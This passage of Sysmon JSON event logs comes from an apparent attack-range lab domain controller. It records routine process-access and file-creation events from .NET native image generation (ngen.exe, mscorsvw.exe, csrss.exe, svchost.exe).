08:07:25.193","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22BD-5F25-0000-0010A5061100}","TargetProcessId":"4364","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8277,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:25.193\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22BD-5F25-0000-0010A5061100}\r\nTargetProcessId: 4364\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:25.193","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22BD-5F25-0000-0010A5061100}","TargetProcessId":"4364","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8278,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:25.193\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22BD-5F25-0000-0010A5061100}\r\nTargetProcessId: 4364\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:25.193","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22BD-5F25-0000-0010A5061100}","TargetProcessId":"4364","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8279,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:07:25.897\r\nProcessGuid: {41C8662E-22BD-5F25-0000-0010A5061100}\r\nProcessId: 4364\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\110c-0\\UIAutomationClientsideProviders.dll\r\nCreationUtcTime: 2020-08-01 08:07:25.897","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:07:25.897","ProcessGuid":"{41C8662E-22BD-5F25-0000-0010A5061100}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\110c-0\\UIAutomationClientsideProviders.dll","CreationUtcTime":"2020-08-01 08:07:25.897","EventReceivedTime":"2020-08-01 08:07:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8280,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:25.943\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-228F-5F25-0000-0010F8640F00}\r\nTargetProcessId: 1476\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:25.943","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-228F-5F25-0000-0010F8640F00}","TargetProcessId":"1476","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8281,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:25.943\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-228F-5F25-0000-0010F8640F00}\r\nTargetProcessId: 1476\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:25.943","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-228F-5F25-0000-0010F8640F00}","TargetProcessId":"1476","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8282,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:25.943\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-228F-5F25-0000-0010F8640F00}\r\nTargetProcessId: 1476\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:25.943","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-228F-5F25-0000-0010F8640F00}","TargetProcessId":"1476","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8283,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:25.975\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22BD-5F25-0000-0010500E1100}\r\nTargetProcessId: 5060\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:25.975","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22BD-5F25-0000-0010500E1100}","TargetProcessId":"5060","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8284,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:25.975\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22BD-5F25-0000-0010500E1100}\r\nTargetProcessId: 5060\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:25.975","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22BD-5F25-0000-0010500E1100}","TargetProcessId":"5060","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8285,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:25.990\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22BD-5F25-0000-0010500E1100}\r\nTargetProcessId: 5060\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 